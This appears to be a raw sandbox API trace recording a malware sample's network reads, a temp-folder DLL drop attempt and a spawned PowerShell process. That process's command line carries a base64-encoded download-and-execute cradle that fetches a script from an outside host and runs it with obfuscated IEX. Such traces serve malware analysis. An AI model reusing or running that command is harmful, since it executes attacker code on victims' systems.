	[0913.425] EncryptMessage (in: phContext=0x1c8bd810, fQOP=0x0, pMessage=0x2fef370, MessageSeqNo=0x0 | out: pMessage=0x2fef370) returned 0x0
	[0913.425] send (s=0x4c8, buf=0x2fef0b0*, len=117, flags=0) returned 117
	[0913.445] setsockopt (s=0x4c8, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0
	[0913.445] recv (in: s=0x4c8, buf=0x2fef4d0, len=5, flags=0 | out: buf=0x2fef4d0*) returned 5
	[0913.656] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 1067
	[0913.657] recv (in: s=0x4c8, buf=0x2fef920, len=15349, flags=0 | out: buf=0x2fef920*) returned 15349
	[0914.003] DecryptMessage (in: phContext=0x1c8bd3d0, pMessage=0x2ff3628, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ff3628, pfQOP=0x0) returned 0x0
	[0914.038] setsockopt (s=0x4c8, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0
	[0914.101] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0914.103] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 6086
	[0914.103] recv (in: s=0x4c8, buf=0x2ff0cbb, len=10330, flags=0 | out: buf=0x2ff0cbb*) returned 10330
	[0914.389] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3014c38, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3014c38, pfQOP=0x0) returned 0x0
	[0914.389] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0914.390] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 1457
	[0914.390] recv (in: s=0x4c8, buf=0x2fefaa6, len=14959, flags=0 | out: buf=0x2fefaa6*) returned 14959
	[0914.643] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3014e78, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3014e78, pfQOP=0x0) returned 0x0
	[0914.645] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0914.645] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 580
	[0914.645] recv (in: s=0x4c8, buf=0x2fef739, len=15836, flags=0 | out: buf=0x2fef739*) returned 15836
	[0914.829] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x30150b8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x30150b8, pfQOP=0x0) returned 0x0
	[0914.829] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0914.829] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 239
	[0914.829] recv (in: s=0x4c8, buf=0x2fef5e4, len=16177, flags=0 | out: buf=0x2fef5e4*) returned 16177
	[0915.234] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x30152f8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x30152f8, pfQOP=0x0) returned 0x0
	[0915.240] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0915.240] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 8474
	[0915.240] recv (in: s=0x4c8, buf=0x2ff160f, len=7942, flags=0 | out: buf=0x2ff160f*) returned 7942
	[0916.091] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3015588, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3015588, pfQOP=0x0) returned 0x0
	[0916.092] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0916.092] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 629
	[0916.092] recv (in: s=0x4c8, buf=0x2fef76a, len=15787, flags=0 | out: buf=0x2fef76a*) returned 15787
	[0916.687] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x30157c8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x30157c8, pfQOP=0x0) returned 0x0
	[0916.688] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0916.688] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 8864
	[0916.688] recv (in: s=0x4c8, buf=0x2ff1795, len=7552, flags=0 | out: buf=0x2ff1795*) returned 3472
	[0916.765] recv (in: s=0x4c8, buf=0x2ff2525, len=4080, flags=0 | out: buf=0x2ff2525*) returned 1352
	[0916.765] recv (in: s=0x4c8, buf=0x2ff2a6d, len=2728, flags=0 | out: buf=0x2ff2a6d*) returned 2728
	[0916.780] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3015a08, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3015a08, pfQOP=0x0) returned 0x0
	[0916.781] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0916.781] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 1555
	[0916.781] recv (in: s=0x4c8, buf=0x2fefb08, len=14861, flags=0 | out: buf=0x2fefb08*) returned 14861
	[0917.070] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3015c70, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3015c70, pfQOP=0x0) returned 0x0
	[0917.074] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0917.074] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 6038
	[0917.074] recv (in: s=0x4c8, buf=0x2ff0c8b, len=10378, flags=0 | out: buf=0x2ff0c8b*) returned 10378
	[0918.066] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3015eb0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3015eb0, pfQOP=0x0) returned 0x0
	[0918.067] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0918.067] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 16416
	[0918.067] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3016118, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3016118, pfQOP=0x0) returned 0x0
	[0918.068] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0918.068] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 7500
	[0918.068] recv (in: s=0x4c8, buf=0x2ff1241, len=8916, flags=0 | out: buf=0x2ff1241*) returned 8916
	[0918.656] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3016358, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3016358, pfQOP=0x0) returned 0x0
	[0918.667] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0918.668] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 3943
	[0918.668] recv (in: s=0x4c8, buf=0x2ff045c, len=12473, flags=0 | out: buf=0x2ff045c*) returned 12473
	[0918.841] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3016598, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3016598, pfQOP=0x0) returned 0x0
	[0918.844] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0918.844] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 386
	[0918.844] recv (in: s=0x4c8, buf=0x2fef677, len=16030, flags=0 | out: buf=0x2fef677*) returned 6432
	[0919.561] recv (in: s=0x4c8, buf=0x2ff0f97, len=9598, flags=0 | out: buf=0x2ff0f97*) returned 9598
	[0919.704] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3016800, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3016800, pfQOP=0x0) returned 0x0
	[0919.707] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0919.707] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 3261
	[0919.707] recv (in: s=0x4c8, buf=0x2ff01b2, len=13155, flags=0 | out: buf=0x2ff01b2*) returned 1072
	[0919.766] recv (in: s=0x4c8, buf=0x2ff05e2, len=12083, flags=0 | out: buf=0x2ff05e2*) returned 536
	[0919.766] recv (in: s=0x4c8, buf=0x2ff07fa, len=11547, flags=0 | out: buf=0x2ff07fa*) returned 11547
	[0920.110] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3016a68, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3016a68, pfQOP=0x0) returned 0x0
	[0920.111] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0920.111] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 5064
	[0920.111] recv (in: s=0x4c8, buf=0x2ff08bd, len=11352, flags=0 | out: buf=0x2ff08bd*) returned 11352
	[0920.363] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3016ca8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3016ca8, pfQOP=0x0) returned 0x0
	[0920.367] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0920.367] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 2579
	[0920.368] recv (in: s=0x4c8, buf=0x2feff08, len=13837, flags=0 | out: buf=0x2feff08*) returned 1072
	[0920.637] recv (in: s=0x4c8, buf=0x2ff0338, len=12765, flags=0 | out: buf=0x2ff0338*) returned 6968
	[0920.637] recv (in: s=0x4c8, buf=0x2ff1e70, len=5797, flags=0 | out: buf=0x2ff1e70*) returned 5797
	[0920.729] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3016f10, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3016f10, pfQOP=0x0) returned 0x0
	[0920.730] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0920.730] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 1702
	[0920.730] recv (in: s=0x4c8, buf=0x2fefb9b, len=14714, flags=0 | out: buf=0x2fefb9b*) returned 14714
	[0920.914] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3017150, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3017150, pfQOP=0x0) returned 0x0
	[0920.914] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0920.914] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 289
	[0920.915] recv (in: s=0x4c8, buf=0x2fef616, len=16127, flags=0 | out: buf=0x2fef616*) returned 16127
	[0921.268] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x30173b8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x30173b8, pfQOP=0x0) returned 0x0
	[0921.269] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0921.269] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 3164
	[0921.269] recv (in: s=0x4c8, buf=0x2ff0151, len=13252, flags=0 | out: buf=0x2ff0151*) returned 13252
	[0921.640] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x30175f8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x30175f8, pfQOP=0x0) returned 0x0
	[0921.642] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0921.642] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 1751
	[0921.642] recv (in: s=0x4c8, buf=0x2fefbcc, len=14665, flags=0 | out: buf=0x2fefbcc*) returned 14665
	[0921.765] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3017860, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3017860, pfQOP=0x0) returned 0x0
	[0921.770] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0921.770] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 1410
	[0921.770] recv (in: s=0x4c8, buf=0x2fefa77, len=15006, flags=0 | out: buf=0x2fefa77*) returned 15006
	[0921.918] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3017aa0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3017aa0, pfQOP=0x0) returned 0x0
	[0921.919] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 2
	[0921.919] recv (in: s=0x4c8, buf=0x2fef4f2, len=3, flags=0 | out: buf=0x2fef4f2*) returned 3
	[0921.953] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 1069
	[0921.953] recv (in: s=0x4c8, buf=0x2fef922, len=15347, flags=0 | out: buf=0x2fef922*) returned 15347
	[0922.122] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3017d08, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3017d08, pfQOP=0x0) returned 0x0
	[0922.123] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0922.123] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 6088
	[0922.123] recv (in: s=0x4c8, buf=0x2ff0cbd, len=10328, flags=0 | out: buf=0x2ff0cbd*) returned 10328
	[0922.193] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3017f48, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3017f48, pfQOP=0x0) returned 0x0
	[0922.194] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0922.194] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 387
	[0922.194] recv (in: s=0x4c8, buf=0x2fef678, len=16029, flags=0 | out: buf=0x2fef678*) returned 16029
	[0922.497] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x30181b0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x30181b0, pfQOP=0x0) returned 0x0
	[0922.503] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0922.503] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 7550
	[0922.503] recv (in: s=0x4c8, buf=0x2ff1273, len=8866, flags=0 | out: buf=0x2ff1273*) returned 8866
	[0922.790] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x30183f0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x30183f0, pfQOP=0x0) returned 0x0
	[0922.791] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0922.792] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 12569
	[0922.792] recv (in: s=0x4c8, buf=0x2ff260e, len=3847, flags=0 | out: buf=0x2ff260e*) returned 3847
	[0922.812] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3018630, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3018630, pfQOP=0x0) returned 0x0
	[0922.813] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0922.813] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 4188
	[0922.813] recv (in: s=0x4c8, buf=0x2ff0551, len=12228, flags=0 | out: buf=0x2ff0551*) returned 12228
	[0922.995] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3018870, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3018870, pfQOP=0x0) returned 0x0
	[0922.996] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0922.996] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 3847
	[0922.996] recv (in: s=0x4c8, buf=0x2ff03fc, len=12569, flags=0 | out: buf=0x2ff03fc*) returned 12569
	[0923.189] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3018ad8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3018ad8, pfQOP=0x0) returned 0x0
	[0923.197] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0923.198] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 8330
	[0923.198] recv (in: s=0x4c8, buf=0x2ff157f, len=8086, flags=0 | out: buf=0x2ff157f*) returned 8086
	[0923.272] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3018d40, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3018d40, pfQOP=0x0) returned 0x0
	[0923.273] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0923.273] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 2629
	[0923.273] recv (in: s=0x4c8, buf=0x2feff3a, len=13787, flags=0 | out: buf=0x2feff3a*) returned 4288
	[0923.352] recv (in: s=0x4c8, buf=0x2ff0ffa, len=9499, flags=0 | out: buf=0x2ff0ffa*) returned 9499
	[0923.439] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3018f80, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3018f80, pfQOP=0x0) returned 0x0
	[0923.442] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0923.442] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 2288
	[0923.442] recv (in: s=0x4c8, buf=0x2fefde5, len=14128, flags=0 | out: buf=0x2fefde5*) returned 14128
	[0923.610] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x30191c0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x30191c0, pfQOP=0x0) returned 0x0
	[0923.611] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0923.611] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 4091
	[0923.612] recv (in: s=0x4c8, buf=0x2ff04f0, len=12325, flags=0 | out: buf=0x2ff04f0*) returned 12325
	[0923.846] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3019428, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3019428, pfQOP=0x0) returned 0x0
	[0923.848] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0923.848] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 4822
	[0923.848] recv (in: s=0x4c8, buf=0x2ff07cb, len=11594, flags=0 | out: buf=0x2ff07cb*) returned 11594
	[0923.944] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3019668, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3019668, pfQOP=0x0) returned 0x0
	[0923.949] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0923.949] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 193
	[0923.950] recv (in: s=0x4c8, buf=0x2fef5b6, len=16223, flags=0 | out: buf=0x2fef5b6*) returned 5360
	[0924.041] recv (in: s=0x4c8, buf=0x2ff0aa6, len=10863, flags=0 | out: buf=0x2ff0aa6*) returned 2144
	[0924.041] recv (in: s=0x4c8, buf=0x2ff1306, len=8719, flags=0 | out: buf=0x2ff1306*) returned 8719
	[0924.225] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x30198a8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x30198a8, pfQOP=0x0) returned 0x0
	[0924.226] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0924.226] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 16416
	[0924.227] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3019ae8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3019ae8, pfQOP=0x0) returned 0x0
	[0924.228] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0924.228] recv (in: s=0x4c8, buf=0x2fef4f5, len=16416, flags=0 | out: buf=0x2fef4f5*) returned 1655
	[0924.228] recv (in: s=0x4c8, buf=0x2fefb6c, len=14761, flags=0 | out: buf=0x2fefb6c*) returned 3472
	[0924.398] recv (in: s=0x4c8, buf=0x2ff08fc, len=11289, flags=0 | out: buf=0x2ff08fc*) returned 11289
	[0924.399] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3019d50, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3019d50, pfQOP=0x0) returned 0x0
	[0924.400] recv (in: s=0x4c8, buf=0x2fef4f0, len=5, flags=0 | out: buf=0x2fef4f0*) returned 5
	[0924.400] recv (in: s=0x4c8, buf=0x2fef4f5, len=4784, flags=0 | out: buf=0x2fef4f5*) returned 4784
	[0924.400] DecryptMessage (in: phContext=0x1c8bd9a0, pMessage=0x3019f90, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3019f90, pfQOP=0x0) returned 0x0
	[0924.406] SetEvent (hEvent=0x384) returned 1
	[0928.215] CoTaskMemAlloc (cb=0x104) returned 0x2d6580
	[0928.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d6580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0928.216] CoTaskMemFree (pv=0x2d6580) 
	[0928.217] CoTaskMemAlloc (cb=0x104) returned 0x2d6580
	[0928.217] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x2d6580, nSize=0x80 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24
	[0928.217] CoTaskMemFree (pv=0x2d6580) 
	[0928.223] CoTaskMemAlloc (cb=0x104) returned 0x2d6580
	[0928.223] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x2d6580, nSize=0x80 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24
	[0928.223] CoTaskMemFree (pv=0x2d6580) 
	[0939.398] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5P5NRG~1\\", lpszLongPath=0x1c8bd670, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 0x1e
	[0939.398] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll", nBufferLength=0x105, lpBuffer=0x1c8bd6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll", lpFilePart=0x0) returned 0x3f
	[0939.398] SetErrorMode (uMode=0x1) returned 0x1
	[0939.399] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vthqexnegi.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffffffffffff
	[0951.491] SetErrorMode (uMode=0x1) returned 0x1
	[0951.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c8bb000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0951.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c8baf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0951.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c8baf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0951.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c8baf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.540] CoTaskMemAlloc (cb=0x104) returned 0x2d6580
	[0954.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d6580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0954.541] CoTaskMemFree (pv=0x2d6580) 

Thread:
	id = 2009
	os_tid = 0x2754


Thread:
	id = 2017
	os_tid = 0x2774


Thread:
	id = 2022
	os_tid = 0x2788

	[0905.225] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0905.229] ResetEvent (hEvent=0x384) returned 1

Thread:
	id = 2046
	os_tid = 0x27e8


Process:
	id = "153"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4520b000"
	os_pid = "0x147c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 792
	os_tid = 0x102c

	[0473.145] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
